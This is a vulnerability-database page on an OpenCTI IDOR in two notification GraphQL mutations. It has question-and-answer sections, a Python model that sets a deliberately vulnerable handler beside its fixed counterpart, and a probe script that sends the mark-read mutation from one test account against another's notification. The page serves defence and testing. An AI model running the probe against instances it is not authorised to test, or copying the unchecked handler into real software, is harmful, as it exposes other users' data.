CVE-2025-46732
BaseFortify

Publication date: 2025-07-18

Last updated on: 2025-08-05

Assigner: GitHub, Inc.

Description
OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to version 6.6.6, an IDOR vulnerability in the GraphQL `NotificationLineNotificationMarkReadMutation` and `NotificationLineNotificationDeleteMutation` mutations of OpenCTI allows an authenticated user to change the read status of, or delete, a notification belonging to another user if they know the UUID of that notification. When changing the read status, the user also receives the content of the notification they modified. Authenticated users in OpenCTI can therefore read, modify and delete notifications of other users if they know the notification's UUID. Version 6.6.6 fixes the issue.
Meta Information
Published: 2025-07-18
Last Modified: 2025-08-05
Generated: 2026-05-07
AI Q&A: 2025-07-18
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
1 associated CPE:
Vendor: citeum
Product: opencti
Version / Range: all versions prior to 6.6.6 (6.6.6 excluded)
CWE
CWE-285 (Improper Authorization): The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability is an Insecure Direct Object Reference (IDOR) in the OpenCTI platform before version 6.6.6. It affects specific GraphQL mutations that handle notifications. An authenticated user who knows the UUID of another user's notification can change the read status or delete that notification. Additionally, when changing the read status, the attacker can view the content of the other user's notification. This happens because the system does not properly enforce authorization checks on these actions. [1]
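The following is an added example, not OpenCTI's code (its resolvers are TypeScript in opencti-graphql). It models the two mutations as plain Python handlers over an in-memory store: the vulnerable shape selects the notification by UUID alone and hands its content back to whoever called, and the fixed shape loads the row and checks that it belongs to the caller before touching it. The store, the user ids "alice" and "bob", the notification texts and the handler names are all constructed for the illustration.

```python
"""Model of the notification IDOR (pre-6.6.6) beside the ownership check that
closes it.  Added example, not OpenCTI's code; store, user ids and handler
names are constructed here to show the missing authorization check."""
import uuid
from dataclasses import dataclass, field


@dataclass
class Notification:
    id: str
    user_id: str          # owner of the notification
    content: str
    is_read: bool = False


@dataclass
class Store:
    """Stand-in for the notification table, keyed by UUID."""
    notifications: dict = field(default_factory=dict)

    def add(self, user_id: str, content: str) -> Notification:
        n = Notification(id=str(uuid.uuid4()), user_id=user_id, content=content)
        self.notifications[n.id] = n
        return n


class NotFound(Exception):
    """Raised for a missing notification and, after the fix, for one the caller does not own."""


# --- Vulnerable shape: the UUID alone selects the row ---------------------

def mark_read_vulnerable(store: Store, caller_id: str, notification_id: str, read: bool = True) -> dict:
    n = store.notifications.get(notification_id)
    if n is None:
        raise NotFound(notification_id)
    n.is_read = read                      # caller_id is never consulted
    return {"id": n.id, "content": n.content, "is_read": n.is_read}  # content leaks to the caller


def delete_vulnerable(store: Store, caller_id: str, notification_id: str) -> str:
    if notification_id not in store.notifications:
        raise NotFound(notification_id)
    del store.notifications[notification_id]   # any authenticated caller can do this
    return notification_id


# --- Fixed shape: load the row *and* check it belongs to the caller -------

def _load_owned(store: Store, caller_id: str, notification_id: str) -> Notification:
    n = store.notifications.get(notification_id)
    # Same outcome for "does not exist" and "exists but not yours", so a guessed
    # UUID cannot be confirmed valid from the difference in the error.
    if n is None or n.user_id != caller_id:
        raise NotFound(notification_id)
    return n


def mark_read_fixed(store: Store, caller_id: str, notification_id: str, read: bool = True) -> dict:
    n = _load_owned(store, caller_id, notification_id)
    n.is_read = read
    return {"id": n.id, "content": n.content, "is_read": n.is_read}


def delete_fixed(store: Store, caller_id: str, notification_id: str) -> str:
    n = _load_owned(store, caller_id, notification_id)
    del store.notifications[n.id]
    return n.id


def run_scenario() -> dict:
    """Bob knows the UUID of Alice's notification and tries both mutations against each shape."""
    store = Store()
    alice_note = store.add("alice", "Report 'Q3 intrusion set' was updated")  # constructed sample
    results = {}

    # Vulnerable handlers: Bob reads Alice's content, then deletes her notification.
    results["vuln_mark_read"] = mark_read_vulnerable(store, "bob", alice_note.id)
    results["vuln_delete"] = delete_vulnerable(store, "bob", alice_note.id)

    # Fixed handlers: the same calls are refused; Alice's own call still works.
    alice_note = store.add("alice", "Indicator 'evil.example' was enriched")  # constructed sample
    try:
        mark_read_fixed(store, "bob", alice_note.id)
        results["fixed_mark_read_by_bob"] = "allowed"
    except NotFound:
        results["fixed_mark_read_by_bob"] = "refused"
    try:
        delete_fixed(store, "bob", alice_note.id)
        results["fixed_delete_by_bob"] = "allowed"
    except NotFound:
        results["fixed_delete_by_bob"] = "refused"
    results["fixed_mark_read_by_alice"] = mark_read_fixed(store, "alice", alice_note.id)["is_read"]
    results["alice_note_survives"] = alice_note.id in store.notifications
    return results


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
```

The design point worth keeping from the fixed shape is that ownership is checked in the same place the row is loaded, so every mutation that goes through `_load_owned` inherits the check, and that a foreign UUID gets the same "not found" answer as a nonexistent one.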


How can this vulnerability impact me?

This vulnerability can allow an authenticated user to read, modify, or delete notifications belonging to other users without proper authorization. This could lead to unauthorized disclosure of notification content and manipulation or removal of notifications, potentially disrupting user awareness or workflow within the OpenCTI platform. [1]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection involves two steps. First, check whether the OpenCTI instance is running a vulnerable version, which is any release prior to 6.6.6 (the fix shipped in 6.6.6). Second, test whether an authenticated user can modify or delete notifications of other users by invoking the GraphQL mutations NotificationLineNotificationMarkReadMutation or NotificationLineNotificationDeleteMutation with a notification UUID that belongs to a different account. In practice this means sending crafted GraphQL mutation requests to the OpenCTI API endpoint (for example with curl or a GraphQL client) from a low-privileged test account, using the UUID of a notification owned by a second test account you control, and observing whether the change is accepted and whether the notification's content is returned. Both mutations change state, so run them only against test accounts and throwaway notifications, and prefer the mark-read mutation over the delete mutation for the probe. [1]
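A two-account probe for the mark-read mutation, as an added example that is not part of the advisory or of OpenCTI's own tooling. It assumes the GraphQL endpoint is `<base>/graphql`, that an API token is sent as `Authorization: Bearer <token>`, and that the schema field behind `NotificationLineNotificationMarkReadMutation` is `notificationMarkRead(id: ID!, read: Boolean!)` returning a `Notification` with `id` and `is_read`; check those names against your instance's schema before trusting a "denied" result. The transport is injectable so the classification logic can be exercised offline with constructed responses.

```python
"""Two-account IDOR probe for the OpenCTI notification mark-read mutation.

Added example, not OpenCTI's or the advisory's code.  Assumed: endpoint
<base>/graphql, bearer-token auth, and schema field
notificationMarkRead(id: ID!, read: Boolean!) { id is_read } (verify against
your instance's schema)."""
import json
import urllib.request
from typing import Callable

# Assumed field name (see module docstring).  The UUID travels in variables, never
# interpolated into the query text.
MARK_READ_QUERY = """
mutation ProbeMarkRead($id: ID!, $read: Boolean!) {
  notificationMarkRead(id: $id, read: $read) { id is_read }
}
"""


def mark_read_request(notification_id: str, read: bool = True) -> dict:
    """JSON body for the probe; mark-read only toggles a flag, so it is the least destructive test."""
    return {"query": MARK_READ_QUERY, "variables": {"id": notification_id, "read": read}}


def post_graphql(url: str, body: dict, token: str) -> dict:
    """Default transport: POST JSON with a bearer token and decode the JSON response."""
    req = urllib.request.Request(
        url,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json", "Authorization": f"Bearer {token}"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.loads(resp.read().decode())


def classify(response: dict, foreign_id: str) -> str:
    """Interpret the server's answer to a mark-read attempt on another user's notification.

    'vulnerable' : the mutation returned the foreign notification (IDOR confirmed).
    'denied'     : null data or a GraphQL error, which is what a fixed build should
                   produce (the exact error text is not assumed here).
    'unexpected' : anything else; inspect by hand.
    """
    data = (response.get("data") or {}).get("notificationMarkRead")
    if isinstance(data, dict) and data.get("id") == foreign_id:
        return "vulnerable"
    if data is None and (response.get("errors") or "data" in response):
        return "denied"
    return "unexpected"


def probe(url: str, attacker_token: str, foreign_id: str,
          transport: Callable[[str, dict, str], dict] = post_graphql) -> str:
    """Run the probe as the attacker test account against a UUID owned by the victim test account."""
    response = transport(url, mark_read_request(foreign_id), attacker_token)
    return classify(response, foreign_id)


if __name__ == "__main__":
    import sys
    # usage: python probe.py https://opencti.example/graphql <attacker-token> <victim-notification-uuid>
    print(probe(sys.argv[1], sys.argv[2], sys.argv[3]))
```

The victim-owned UUID is taken from a second account you control (its own notification list), so the probe never depends on guessing identifiers; a "vulnerable" verdict means the attacker account changed, and was shown, a notification it does not own.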


What immediate steps should I take to mitigate this vulnerability?

The immediate mitigation step is to upgrade OpenCTI to version 6.6.6 or later, where this IDOR vulnerability is fixed. Until the upgrade can be performed, restrict access to the OpenCTI platform to trusted users only, monitor for suspicious activity involving notification mutations, and consider implementing additional access controls or network restrictions to limit exploitation. [1]

